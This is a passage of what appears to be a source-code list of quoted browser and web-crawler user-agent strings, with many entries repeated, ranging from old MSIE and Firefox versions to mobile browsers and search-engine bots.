NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 